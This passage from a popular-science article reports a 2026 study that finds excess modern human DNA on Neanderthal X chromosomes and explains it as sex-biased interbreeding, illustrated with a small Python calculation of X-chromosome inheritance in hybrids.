Now, three researchers at the University of Pennsylvania, Alexander Platt, Daniel N. Harris, and Sarah Tishkoff, have done the converse analysis: examining the X chromosomes of the handful of completed Neanderthal genomes we have. It turns out there's also a strong bias toward modern human sequences there, and the authors interpret that as selective mating, with Neanderthal males showing a strong preference for modern human females and their descendants.
Given how long modern humans and Neanderthals had been evolving as separate populations, some degree of genetic incompatibility is definitely possible. Lots of proteins interact in various ways, and the genes behind these interaction networks will evolve together—a change in one gene will often lead to compensatory changes in other genes in the network. Over time, those changes may mean re-introducing the original gene will actually disrupt the network, with a negative impact on fitness.
That means the introduction of some Neanderthal genes into the modern human genome (or vice versa) would be disruptive and make carriers of them less fit. So they'd be selected against and lost over the ensuing generations. Of course, some segments would likely be lost at random—the genome's pretty big, and the modern human population was likely large and growing, allowing its DNA to dilute out the influence of other human populations. Figuring out which influence is dominant can be challenging.
One way to sort this out is to make the same comparison with Neanderthal genomes. If a Neanderthal gene is disruptive in a modern human context, then it's likely that the modern human version will be disruptive in Neanderthals. And, in fact, that's what we seem to see: A look at one Neanderthal genome found that there's some correlation between the Neanderthal deserts in the human genome and the human deserts in that Neanderthal.
All of that, however, doesn't go far toward explaining why the X chromosome looks like a giant Neanderthal desert, with long stretches of nothing but modern human DNA. The genetics of the X is complicated by the fact that males inherit a single copy from their mothers, so they have only a single copy of almost every gene on it. If any of those genes are causing problems, they will be quickly selected against in males.
Thus, evolutionary selection against the Neanderthal X is definitely an option. The alternative they consider is that it's the product of biased matings. If most mating between the two groups was biased in some way, it could skew the frequency with which the X chromosome was inherited. For example, if most of the matings involved Neanderthal males and modern human females, then you would have fewer Neanderthal X's around as a result, since only half of a male's offspring will inherit an X chromosome from him.
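To put rough numbers on that asymmetry, here is a toy accounting of our own (not a calculation from the paper) of how many X chromosomes in first-generation hybrid offspring come from the Neanderthal parent, depending on which parent is the Neanderthal:

    # Toy accounting (ours, not the paper's): share of X chromosomes of Neanderthal
    # origin in first-generation hybrids, assuming equal numbers of sons and daughters.
    def hybrid_x_fraction(neanderthal_parent):
        if neanderthal_parent == "father":
            # Daughters: one X from each parent (1 Neanderthal of 2).
            # Sons: their single X comes from the modern-human mother (0 of 1).
            neanderthal_x, total_x = 1, 3
        else:
            # Daughters: 1 Neanderthal of 2. Sons: single X from the Neanderthal mother (1 of 1).
            neanderthal_x, total_x = 2, 3
        return neanderthal_x / total_x

    print(hybrid_x_fraction("father"))  # ~0.33 -- Neanderthal father x modern-human mother
    print(hybrid_x_fraction("mother"))  # ~0.67 -- modern-human father x Neanderthal mother
    # Autosomes, by contrast, are 0.5 Neanderthal in either direction.

Matings that mostly ran in the Neanderthal-father direction would therefore start the hybrid pool off with a deficit of Neanderthal X chromosomes relative to autosomes, and continued matings in the same direction would compound that skew.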
To figure out which result might be the case, the researchers again turned to the three Neanderthal genomes we have available, looking at the pattern of inheritance along the X chromosome. That was compared to X chromosomes from African populations that have very little Neanderthal DNA.
The results contrasted sharply with what was seen elsewhere in the genome, where Neanderthal deserts in modern humans correspond to human deserts in the Neanderthal genome. Instead, the X chromosome in Neanderthals tended to have an excess of modern human sequences—exactly as you see in modern humans. It appears that the modern human X ended up more common in both human and Neanderthal populations.
Could this be from evolutionary selection for something favorable about it? The researchers found that modern human DNA found on the Neanderthal X had a lower than average frequency of important sequences like those that regulate nearby genes or code for proteins. While that doesn't rule out evolutionary selection as a factor, it does make it seem a bit less likely, since there's less indication that the DNA being kept around is functional.
That leaves preferential mating as a more probable explanation. But the modern human DNA was present at such a high frequency on the X that it's difficult to explain by a simple preference of Neanderthal males for modern human females. Instead, you'd have to have a continued preference for the offspring of these matches as well. "We did not rule out more complicated scenarios combining selection and sex biases, such as natural selection acting as a modifying force on top of the strong signature left by sex bias," the authors also note.
Overall, we're left with a picture of a relatively large number of matings between male Neanderthals and modern human females. The offspring of these matings ended up in both the modern human and Neanderthal populations; in the latter, their offspring were favored enough to have led to an excess contribution to the X chromosome.
Science, 2026. "Interbreeding between Neanderthals and modern humans was strongly sex biased"
DOI: 10.1126/science.aea6774 (Source).